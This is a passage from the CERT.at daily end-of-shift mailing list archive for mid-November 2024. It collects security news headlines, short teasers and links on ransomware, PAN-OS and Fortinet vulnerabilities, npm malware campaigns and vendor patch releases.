Why don’t we just flip the switch? --------------------------------------------- https://letsencrypt.org/2014/11/18/announcing-lets-encrypt/ ∗∗∗ Achieving NIST CSF 2.0 Compliance: Best Practices ∗∗∗ --------------------------------------------- Cybersecurity is an ever-growing concern in today’s digital era. With the rise of cyberattacks and data breaches, organizations must adopt best practices to safeguard their sensitive information. One of the leading frameworks guiding organizations in securing their digital assets is the NIST CSF 2.0 by National Institute of Standards and .. --------------------------------------------- https://fortbridge.co.uk/regulations/achieving-nist-csf-2-0-compliance-with… ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-5815-1 needrestart - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00229.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.11.2024
by Daily end-of-shift report 19 Nov '24

19 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 18-11-2024 18:00 − Dienstag 19-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Spotify abused to promote pirated software and game cheats ∗∗∗ --------------------------------------------- Spotify playlists and podcasts are being abused to push pirated software, game cheat codes, spam links, and "warez" sites. By injecting targeted keywords and links in playlist names and podcast descriptions, threat actors may .. --------------------------------------------- https://www.bleepingcomputer.com/news/security/spotify-abused-to-promote-pi… ∗∗∗ New Helldown Ransomware Variant Expands Attacks to VMware and Linux Systems ∗∗∗ --------------------------------------------- Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus."Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia .. --------------------------------------------- https://thehackernews.com/2024/11/new-helldown-ransomware-expands-attacks.h… ∗∗∗ Critical 9.8-rated VMware vCenter RCE bug exploited after patch fumble ∗∗∗ --------------------------------------------- If you didnt fix this a month ago, your to-do list probably needs a reshuffle Two VMware vCenter server bugs, including a critical heap-overflow vulnerability that leads to remote code execution (RCE), have been exploited in attacks after Broadcom’s first attempt to fix the flaws fell short. --------------------------------------------- https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/ ∗∗∗ Veritas Enterprise Vault: Kritische Codeschmuggel-Lücken in Archivsoftware ∗∗∗ --------------------------------------------- In Vertias Enterprise Vault können Angreifer kritische Lücke zum Einschleusen von Schadcode missbrauchen. --------------------------------------------- https://www.heise.de/news/Veritas-Enterprise-Vault-Kritische-Codeschmuggel-… ∗∗∗ Kritische Palo-Alto-Lücke: Details und Patches sind da, CISA warnt vor Exploit ∗∗∗ --------------------------------------------- Fast drei Wochen nach ersten Exploit-Gerüchten hat der Hersteller nun endlich reagiert, trickst aber. Derweil warnt die US-Cyberbehörde vor Angriffen. --------------------------------------------- https://www.heise.de/news/Kritische-Palo-Alto-Luecke-Patches-sind-da-CISA-w… ∗∗∗ FreeBSD Foundation releases Bhyve and Capsicum security audit ∗∗∗ --------------------------------------------- The FreeBSD Foundation has announced the release of a security audit report conducted by security firm Synacktiv. The audit uncovered a number of vulnerabilities: Most of these vulnerabilities have been addressed through official FreeBSD Project security advisories, which offer detailed information about each vulnerability, its impact, and the measures .. --------------------------------------------- https://lwn.net/Articles/998615/ ∗∗∗ FrostyGoop’s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications ∗∗∗ --------------------------------------------- We analyze FrostyGoop malware, which targets OT systems. This article walks through newly discovered samples, indicators, and also examines configurations and network communications. --------------------------------------------- https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/ ∗∗∗ The Importance of Establishing a Solid Third Party Risk Management Framework for Risk Mitigation ∗∗∗ --------------------------------------------- In the previous post, we introduced the concept of Third-Party Risk Management (TPRM) and its importance in today’s interconnected world. Now, let us have a look at the practical aspects of building a solid TPRM program and why it is important for your company. 1. Start with a Third-Party Inventory The first step in building .. --------------------------------------------- https://blog.nviso.eu/2024/11/19/the-importance-of-establishing-a-solid-thi… ∗∗∗ Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden ∗∗∗ --------------------------------------------- A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked .. --------------------------------------------- https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/ ∗∗∗ Threat Actors Hijack Misconfigured Servers for Live Sports Streaming ∗∗∗ --------------------------------------------- To keep up with the ever-evolving world of cybersecurity, Aqua Nautilus researchers deploy honeypots that mimic real-world development environments. During a recent threat-hunting operation, they uncovered a surprising new .. --------------------------------------------- https://blog.aquasec.com/threat-actors-hijack-misconfigured-servers-for-liv… ∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗ --------------------------------------------- Note: Since this is breaking news and more details are being released, were updating this .. --------------------------------------------- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve… ∗∗∗ NVD Backlog Tops 20,000 CVEs Awaiting Analysis as NIST Prepares System Updates ∗∗∗ --------------------------------------------- CVEs awaiting analysis by the NVD have broken the 20,000 mark, after the security community noticed its enrichment activity slowed to nearly a halt again last week. NIST failed to meet its self-imposed deadline of .. --------------------------------------------- https://socket.dev/blog/nvd-backlog-tops-20-000-cves ∗∗∗ Threat Actor Exposes Playbook for Exploiting npm to Build Blockchain-Powered Botnets ∗∗∗ --------------------------------------------- In October 2024, Socket discovered a widespread npm malware campaign using Ethereum smart contracts to evade detection and maintain control over infected systems. Building on our initial research and equipped with analyses of the .. --------------------------------------------- https://socket.dev/blog/exploiting-npm-to-build-a-blockchain-powered-botnet ∗∗∗ Extending Burp Suite for fun and profit – The Montoya way – Part 7 ∗∗∗ --------------------------------------------- Last time we saw how to develop an extension that will add custom active and passive checks to the Burp Scanner. Today we will modify that extension to detect serialization issues using .. --------------------------------------------- https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-t… ∗∗∗ U.S. Extradites and Charges Alleged Phobos Ransomware Admin ∗∗∗ --------------------------------------------- The United States secured the extradition of a Russian national from South Korea who is allegedly the mastermind behind the notorious Phobos ransomware. Evgenii Ptitsyn, 42, is accused of administering the Phobos .. --------------------------------------------- https://thecyberexpress.com/us-charges-alleged-phobos-ransomware-admin/ ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1516: Trend Micro Deep Security Agent Manual Scan Command Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro Deep Security Agent. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51503. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1516/ ∗∗∗ ZDI-24-1517: McAfee Total Protection Uncontrolled Search Path Element Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows local attackers to escalate privileges on affected installations of McAfee Total Protection. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7. The following CVEs are assigned: CVE-2024-49592. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1517/ ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (.NET 9.0, bcc, bluez, bpftrace, bubblewrap, flatpak, buildah, cockpit, containernetworking-plugins, cups, cyrus-imapd, edk2, expat, firefox, fontforge, gnome-shell, gnome-shell-extensions, grafana, grafana-pcp, gtk3, httpd, iperf3, jose, krb5, libgcrypt, libsoup, libvirt, libvpx, lldpd, microcode_ctl, .. --------------------------------------------- https://lwn.net/Articles/998755/ ∗∗∗ Oracle Security Alert for CVE-2024-21287 - 18 November 2024 ∗∗∗ --------------------------------------------- https://www.oracle.com/security-alerts/alert-cve-2024-21287.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.11.2024
by Daily end-of-shift report 18 Nov '24

18 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 15-11-2024 18:00 − Montag 18-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Honeypot: Forscher veralbert Scriptkiddies mit Fake-Ransomware ∗∗∗ --------------------------------------------- Ein Tool namens Jinn sollte Ransomware-Angriffe vereinfachen. Tatsächlich war das ein Honeypot, auf den so einige Akteure reingefallen sind. --------------------------------------------- https://www.golem.de/news/honeypot-forscher-veralbert-scriptkiddies-mit-fak… ∗∗∗ Women In Russian-Speaking Cybercrime: Mythical Creatures or Significant Members of Underground? ∗∗∗ --------------------------------------------- A blog detailing in-depth research into women in Russian-speaking cybercrime. --------------------------------------------- https://www.sans.org/blog/women-in-russian-speaking-cybercrime-mythical-cre… ∗∗∗ DORA-Kernthemen meistern: Ein Deep Dive in Incident Management ∗∗∗ --------------------------------------------- In diesem Blogbeitrag befassen wir uns mit den Anforderungen an DORA Incident Management. --------------------------------------------- https://sec-consult.com/de/blog/detail/dora-kernthemen-meistern-ein-deep-di… ∗∗∗ Swiss cheesed off as postal service used to spread malware ∗∗∗ --------------------------------------------- QR codes arrive via an age-old delivery system Switzerlands National Cyber Security Centre (NCSC) has issued an alert about malware being spread via the countrys postal service. --------------------------------------------- https://www.theregister.com/2024/11/16/swiss_malware_qr/ ∗∗∗ WTF: Sicherheitsforscher finden beim Nachstellen einer Lücke drei neue ∗∗∗ --------------------------------------------- Als die Watchtowr Labs-Forscher die Lücke im FortiManager nachprüfen wollten, fanden sie weitere Fehler und unvollständige Fixes. --------------------------------------------- https://www.heise.de/news/Sicherheitsforscher-finden-beim-Nachstellen-einer… ∗∗∗ T-Mobile von chinesischem Cyberangriff betroffen ∗∗∗ --------------------------------------------- Laut einem Bericht konnten die Hacker in mehrere Telekommunikationsunternehmen in den USA wie auch international eindringen --------------------------------------------- https://www.derstandard.at/story/3000000245232/t-mobile-von-chinesischem-cy… ∗∗∗ Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 ∗∗∗ --------------------------------------------- We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations. --------------------------------------------- https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ ∗∗∗ Akute Welle an DDoS-Angriffen gegen österreichische Unternehmen und Organisationen ∗∗∗ --------------------------------------------- Seit heute Früh sind verschiedene österreichische Unternehmen und Organisationen aus unterschiedlichen Branchen und Sektoren mit DDoS-Angriffen konfrontiert. Die genauen Hintergründe der Attacke sind uns zurzeit nicht bekannt, Hinweise für eine hacktivistische Motivation liegen jedoch vor. In Anbetracht der aktuellen Geschehnisse .. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/11/ddos-angriffe-november-2024 ∗∗∗ BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA ∗∗∗ --------------------------------------------- KEY TAKEAWAYS Volexity discovered and reported a vulnerability in Fortinets Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the .. --------------------------------------------- https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlien… ∗∗∗ Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices ∗∗∗ --------------------------------------------- In this blog entry, we discuss Water Barghests exploitation of IoT devices, transforming them into profitable assets through advanced automation and monetization techniques. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/k/water-barghest.html ∗∗∗ What To Use Instead of PGP ∗∗∗ --------------------------------------------- It’s been more than five years since The PGP Problem was published, and I still hear from people who believe that using PGP (whether GnuPG or another OpenPGP implementation) is a thing .. --------------------------------------------- https://soatok.blog/2024/11/15/what-to-use-instead-of-pgp/ ∗∗∗ TPM-Backed SSH Keys on Windows 11 ∗∗∗ --------------------------------------------- On my MacBook, I’ve been using using TPM/security key-based SSH keys for years since it’s where I do the most development and the software support is good. Secretive is a decent app I can vouch for. Before that, I was .. --------------------------------------------- https://cedwards.xyz/tpm-backed-ssh-keys-on-windows-11/ ∗∗∗ Reverse Engineering iOS 18 Inactivity Reboot ∗∗∗ --------------------------------------------- iOS 18 introduced a new inactivity reboot security feature. What does it protect from and how does it work? This blog post covers all the details down to a kernel extension and the Secure Enclave Processor. --------------------------------------------- https://naehrdine.blogspot.com/2024/11/reverse-engineering-ios-18-inactivit… ∗∗∗ Malicious npm Package Exploits WhatsApp Authentication with Remote Kill Switch for File Destruction ∗∗∗ --------------------------------------------- A malicious npm package disguised as a WhatsApp client is exploiting authentication flows with a remote kill switch to exfiltrate data and destroy files. --------------------------------------------- https://socket.dev/blog/malicious-npm-package-exploits-whatsapp-authenticat… ∗∗∗ Redis CVE-2024-31449: How to Reproduce and Mitigate the Vulnerability ∗∗∗ --------------------------------------------- On October 7, 2024, information about a serious vulnerability in Redis, identified as CVE-2024-31449, was published. This vulnerability allows an authenticated user to execute remote code using specially .. --------------------------------------------- https://redrays.io/blog/redis-cve-2024-31449-how-to-reproduce-and-mitigate-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (binutils, libsoup, squid:4, tigervnc, and webkit2gtk3), Debian (icinga2, postgresql-13, postgresql-15, smarty3, symfony, thunderbird, and waitress), Fedora (dotnet9.0, ghostscript, microcode_ctl, php-bartlett-PHP-CompatInfo, python-waitress, and webkitgtk), Gentoo (Perl, Pillow, and X.Org X server, XWayland), .. --------------------------------------------- https://lwn.net/Articles/998570/ ∗∗∗ CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) (Severity: CRITICAL) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-0012 ∗∗∗ CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9474 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.11.2024
by Daily end-of-shift report 15 Nov '24

15 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 14-11-2024 18:00 − Freitag 15-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Diese dummen Passwörter werden am häufigsten verwendet ∗∗∗ --------------------------------------------- Sind eure Accounts gut geschützt? Werft zur Sicherheit einen Blick auf diese Liste - hoffentlich fühlt ihr euch nicht ertappt. --------------------------------------------- https://futurezone.at/digital-life/dumme-passwoerter-oesterreich-internatio… ∗∗∗ Cyberangriff auf Destatis: Hacker erbeuten Firmendaten des Statistischen Bundesamtes ∗∗∗ --------------------------------------------- Der 3,8 GBytes große Datensatz bietet Zugriff auf von Unternehmen gemeldete Informationen. Das attackierte System wurde erst kürzlich modernisiert. --------------------------------------------- https://www.golem.de/news/cyberangriff-auf-destatis-hacker-erbeuten-firmend… ∗∗∗ MacOS 15.1: Apple patcht Drittanbieter-Firewalls kaputt ∗∗∗ --------------------------------------------- Wer unter MacOS 15.1 Drittanbieter-Firewalls wie Little Snitch verwendet, könnte auf Probleme stoßen. Filterregeln bleiben je nach Konfiguration wirkungslos. --------------------------------------------- https://www.golem.de/news/macos-15-1-apple-patcht-drittanbieter-firewalls-k… ∗∗∗ New Glove Stealer Malware Bypasses Google Chrome’s App-Bound to Steal Data ∗∗∗ --------------------------------------------- The New Glove Stealer malware has the ability to bypass Google Chrome’s Application-Bound (App-Bound) encryption to steal browser cookies. The threat actors’ attacks employed social engineering techniques akin to .. --------------------------------------------- https://heimdalsecurity.com/blog/glove-stealer-malware/ ∗∗∗ Gegen Enkeltrickbetrug: KI-Omi soll Kriminelle in endlose Gespräche verwickeln ∗∗∗ --------------------------------------------- Eine KI-generierte Omi soll für O2 Kriminelle beschäftigen, die echten Menschen per Telefon das Geld aus Tasche ziehen wollen. Dazu soll sie reden und reden. --------------------------------------------- https://www.heise.de/news/Gegen-Enkeltrickbetrug-KI-Omi-soll-Kriminelle-in-… ∗∗∗ Wordpress-Plug-in Really Simple Security gefährdet 4 Millionen Websites ∗∗∗ --------------------------------------------- Rund vier Millionen Wordpress-Seiten nutzen das Plug-in Really Simple Security. Angreifer aus dem Netz können sie kompromittieren. --------------------------------------------- https://www.heise.de/news/Wordpress-Plug-in-Really-Simple-Security-gefaehrd… ∗∗∗ An Interview With the Target & Home Depot Hacker ∗∗∗ --------------------------------------------- In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and .. --------------------------------------------- https://krebsonsecurity.com/2024/11/an-interview-with-the-target-home-depot… ∗∗∗ Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack ∗∗∗ --------------------------------------------- North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities. --------------------------------------------- https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cl… ∗∗∗ Kritische Sicherheitslücke in Laravel Framework - Updates verfügbar ∗∗∗ --------------------------------------------- Im Laravel Framework wurde eine kritische Sicherheitslücke entdeckt. Die Schwachstelle ermöglicht es Angreifern, durch manipulierte URLs unbefugten Zugriff auf Anwendungen zu erlangen und Umgebungsvariablen zu manipulieren. --------------------------------------------- https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-lara… ∗∗∗ Safeguarding Healthcare Organizations from IoMT Risks ∗∗∗ --------------------------------------------- The healthcare industry has undergone significant transformation with the emergence of the Internet of Medical Things (IoMT) devices. These devices ranging from wearable monitors to network imaging systems collect and process vast .. --------------------------------------------- https://levelblue.com/blogs/security-essentials/safeguarding-healthcare-org… ∗∗∗ Zero-day exploitation targeting Palo Alto Networks firewall management interfaces ∗∗∗ --------------------------------------------- Palo Alto Networks has indicated they are observing threat activity exploiting a zero-day unauthenticated remote command execution vulnerability in their firewall management interfaces. --------------------------------------------- https://www.rapid7.com/blog/post/2024/11/15/etr-zero-day-exploitation-targe… ∗∗∗ Microsoft Power Pages Misconfigurations Expose Millions of Records Globally ∗∗∗ --------------------------------------------- SaaS Security firm AppOmni has identified misconfigurations in Microsoft Power Pages that can lead to severe data breaches. --------------------------------------------- https://hackread.com/microsoft-power-pages-misconfigurations-data-leak/ ∗∗∗ Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation ∗∗∗ --------------------------------------------- Written by: Matthijs Gielen, Jay ChristiansenBackgroundNew solutions, old problems. Artificial intelligence (AI) and large language models (LLMs) are here to signal a new day in the cybersecurity world, but what does that mean for us—the attackers and defenders—and our battle to improve security through all the noise?Data is everywhere. For most .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-… ∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Against LDAP Injection Threats ∗∗∗ --------------------------------------------- In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Kubernetes Audit Log “Gotchas” ∗∗∗ --------------------------------------------- How to overcome challenges and security gaps when using K8s audit logs for forensics and attack detection. --------------------------------------------- https://www.wiz.io/blog/overcoming-kubernetes-audit-log-challenges ∗∗∗ Massive npm Malware Campaign Leverages Ethereum Smart Contracts To Evade Detection and Maintain Control ∗∗∗ --------------------------------------------- Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations - making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers .. --------------------------------------------- https://socket.dev/blog/massive-npm-malware-campaign-leverages-ethereum-sma… ∗∗∗ PyPI Introduces Digital Attestations to Strengthen Python Package Security ∗∗∗ --------------------------------------------- The Python Package Index (PyPI) has announced support for digital attestations. This new feature allows package maintainers to publish signed digital attestations when uploading their projects, providing an additional layer of trust and verification for users.What Are Digital Attestations?Digital attestations are cryptographic statements or .. --------------------------------------------- https://socket.dev/blog/pypi-introduces-digital-attestations ∗∗∗ 60 Hours of Cyber Defense: Hong Kong’s Innovative Cybersecurity Drill Begins ∗∗∗ --------------------------------------------- Hong Kong has initiated its first-ever cybersecurity drill, set to run for a total of 60 hours. The Hong Kong cybersecurity drill commenced on Friday, with plans to establish it as an annual event moving forward. Innovation minister Sun Dong emphasized the importance of this initiative, stating that maintaining cybersecurity is essential for .. --------------------------------------------- https://thecyberexpress.com/hong-kong-cybersecurity-drill/ ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack ∗∗∗ --------------------------------------------- https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-mi… ∗∗∗ [webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) ∗∗∗ --------------------------------------------- https://www.exploit-db.com/exploits/52082 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.11.2024
by Daily end-of-shift report 14 Nov '24

14 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 13-11-2024 18:00 − Donnerstag 14-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 ∗∗∗ --------------------------------------------- While the FortiJump patch does effectively neutralise the devastating RCE that is FortiJump, we’re still a little concerned about FortiManager’s overall code quality. We note that our som/export vulnerability, ‘FortiJump Higher’, is still functional, even in patched versions, allowing adversaries to elevate from one managed FortiGate appliance to the central FortiManager appliance. --------------------------------------------- https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-2311… ∗∗∗ New PXA Stealer targets government and education sectors for sensitive information ∗∗∗ --------------------------------------------- Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia. --------------------------------------------- https://blog.talosintelligence.com/new-pxa-stealer/ ∗∗∗ Advertisers are pushing ad and pop-up blockers using old tricks ∗∗∗ --------------------------------------------- A malvertising campaign using an old school trick was found pushing to different ad blockers. [..] In the olden days, that something extra used to be video codecs or specific video players, but now we’ll be told we need a browser extension to “continue watching in safe mode.” [..] To us, this looks like a campaign executed by an affiliate, a company that promotes products or services from another company. If someone buys something through the affiliate’s efforts, the affiliate earns a commission. --------------------------------------------- https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-a… ∗∗∗ Сrimeware and financial cyberthreats in 2025 ∗∗∗ --------------------------------------------- Kasperskys GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025. --------------------------------------------- https://securelist.com/ksb-financial-and-crimeware-predictions-2025/114565/ ∗∗∗ Malware: Erkennung entgehen durch angeflanschtes ZIP ∗∗∗ --------------------------------------------- IT-Forscher haben Malware entdeckt, die der Erkennung durch Virenscanner durch Verkettung von ZIP-Dateien entgeht. --------------------------------------------- https://www.heise.de/-10034752 ∗∗∗ Gratis-Tool: Sicherheitsforscher knacken ShrinkLocker-Verschlüsselung ∗∗∗ --------------------------------------------- Der Erpressungstrojaner ShrinkLocker nutzt Microsofts Bitlocker, um Windows-Systeme zu verschlüsseln. Ein Entschlüsselungstool hilft. --------------------------------------------- https://www.heise.de/-10034933 ∗∗∗ PHP Reinfector and Backdoor Malware Target WordPress Sites ∗∗∗ --------------------------------------------- We recently observed a surge in WordPress websites being infected by a sophisticated PHP reinfector and backdoor malware. While we initially believed that the infection was linked to the wpcode plugin, we found that several sites without this plugin were compromised as well. Upon deeper investigation, we discovered that this malware not only reinfects website files but also embeds malicious code into other plugins and database tables wp_posts and wp_options. --------------------------------------------- https://blog.sucuri.net/2024/11/php-reinfector-and-backdoor-malware-target-… ∗∗∗ Malware Spotlight: A Deep-Dive Analysis of WezRat ∗∗∗ --------------------------------------------- Check Point Research (CPR) provides a comprehensive analysis of a custom modular infostealer, tracked as WezRat, after the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory and attributed the malware to the Iranian cyber group Emennet Pasargad. --------------------------------------------- https://research.checkpoint.com/2024/wezrat-malware-deep-dive/ ∗∗∗ Lazarus Group Targets macOS with RustyAttr Trojan in Fake Job PDFs ∗∗∗ --------------------------------------------- Group-IB has uncovered Lazarus group’s stealthy new trojan and technique of hiding malicious code in extended attributes on macOS. --------------------------------------------- https://hackread.com/lazarus-group-macos-rustyattr-trojan-fake-job-pdfs/ ===================== = Vulnerabilities = ===================== ∗∗∗ 4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- This is one of the more serious vulnerabilities that we have reported on in our 12 year history as a security provider for WordPress. This vulnerability affects Really Simple Security, formerly known as Really Simple SSL, installed on over 4 million websites, and allows an attacker to remotely gain full administrative access to a site running the plugin. CVE-2024-10924, CVSS Score: 9.8 (Critical) --------------------------------------------- https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/ ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (llama-cpp, mingw-expat, python3.6, webkit2gtk4.0, and xorg-x11-server-Xwayland), Mageia (java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk & java-latest-openjdk and libarchive), Oracle (expat, gstreamer1-plugins-base, kernel, libsoup, podman, and tigervnc), SUSE (buildah, java-1_8_0-openjdk, and switchboard-plug-bluetooth), and Ubuntu (zlib). --------------------------------------------- https://lwn.net/Articles/998143/ ∗∗∗ CISA Releases Nineteen Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- Siemens, Rockwell, Hitachi, 2N, Elvaco, Baxter --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/11/14/cisa-releases-nineteen-i… ∗∗∗ GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7 ∗∗∗ --------------------------------------------- These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. [..] An issue was discovered in GitLab CE/EE affecting all versions starting from 16.0 prior to 17.3.7, starting from 17.4 prior to 17.4.4, and starting from 17.5 prior to 17.5.2, which could have allowed unauthorized access to the Kubernetes agent in a cluster under specific configurations. CVE-2024-9693, CVE-2024-7404, CVE-2024-8648, CVE-2024-8180, CVE-2024-10240 --------------------------------------------- https://thecyberthrone.in/2024/11/14/gitlab-fixes-high-severity-vulnerabili… ∗∗∗ Drupal: POST File - Critical - Cross Site Scripting, Arbitrary PHP code execution - SA-CONTRIB-2024-060 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-060 ∗∗∗ Drupal: POST File - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-059 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-059 ∗∗∗ Fortinet: Lack of capacity to filter logs by administrator access ∗∗∗ --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-23-267 ∗∗∗ Palo Alto: CVE-2024-2551 PAN-OS: Firewall Denial of Service (DoS) Using a Specially Crafted Packet (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-2551 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.11.2024
by Daily end-of-shift report 13 Nov '24

13 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 12-11-2024 18:00 − Mittwoch 13-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Itsmydata: Hackerin veröffentlicht erneut Bonitätsdaten von Jens Spahn ∗∗∗ --------------------------------------------- Erst über Bonify, nun über Itsmydata: Lilith Wittmann hat sich mal wieder Bonitätsdaten von Jens Spahn beschafft. Immerhin hat sich sein Score verbessert. --------------------------------------------- https://www.golem.de/news/itsmydata-hackerin-veroeffentlicht-erneut-bonitae… ∗∗∗ Threats in space (or rather, on Earth): internet-exposed GNSS receivers ∗∗∗ --------------------------------------------- Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks. --------------------------------------------- https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/ ∗∗∗ Chinas Volt Typhoon crew and its botnet surge back with a vengeance ∗∗∗ --------------------------------------------- Ohm, for flux sake Chinas Volt Typhoon crew and its botnet are back, compromising old Cisco routers once again to break into critical infrastructure networks and kick off cyberattacks, according to security researchers. --------------------------------------------- https://www.theregister.com/2024/11/13/china_volt_typhoon_back/ ∗∗∗ Stromanbieter Tibber gehackt, 50.000 deutsche Kunden betroffen ∗∗∗ --------------------------------------------- Tibber bestätigt, dass Hacker eingedrungen sind und Kundendaten an sich gebracht haben. Im Darknet werden diese nun verkauft. --------------------------------------------- https://www.heise.de/news/Stromanbieter-Tibber-gehackt-50-000-deutsche-Kund… ∗∗∗ Sicherheitsupdates: Zoom Room Client & Co. angreifbar ∗∗∗ --------------------------------------------- Die Entwickler rüsten verschiedene Zoom-Apps gegen mögliche Angriffe. Davon sind unter anderem macOS und Windows betroffen. --------------------------------------------- 